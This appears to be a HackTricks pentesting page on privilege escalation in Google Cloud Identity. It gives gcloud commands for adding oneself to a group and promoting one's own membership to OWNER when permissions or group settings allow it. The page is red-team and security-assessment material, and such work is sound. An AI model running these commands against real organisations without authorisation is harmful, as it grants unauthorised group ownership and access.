Files
hacktricks-cloud/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudidentity-privesc.md
2024-12-12 19:35:48 +01:00

3.5 KiB

GCP - Cloudidentity Privesc

{% hint style="success" %} Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks
{% endhint %}

Cloudidentity

For more information about the cloudidentity service, check this page:

{% content-ref url="../gcp-services/gcp-iam-and-org-policies-enum.md" %} gcp-iam-and-org-policies-enum.md {% endcontent-ref %}

Add yourself to a group

If your user has enough permissions or the group is misconfigured, he might be able to make himself a member of a new group:

{% code overflow="wrap" %}

gcloud identity groups memberships add --group-email <email> --member-email <email> [--roles OWNER]
# If --roles isn't specified you will get MEMBER

{% endcode %}

Modify group membership

If your user has enough permissions or the group is misconfigured, he might be able to make himself OWNER of a group he is a member of:

{% code overflow="wrap" %}

# Check the current membership level
gcloud identity groups memberships describe --member-email <email> --group-email <email>

# If not OWNER try
gcloud identity groups memberships modify-membership-roles --group-email <email> --member-email <email> --add-roles=OWNER

{% endcode %}

{% hint style="success" %} Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks
{% endhint %}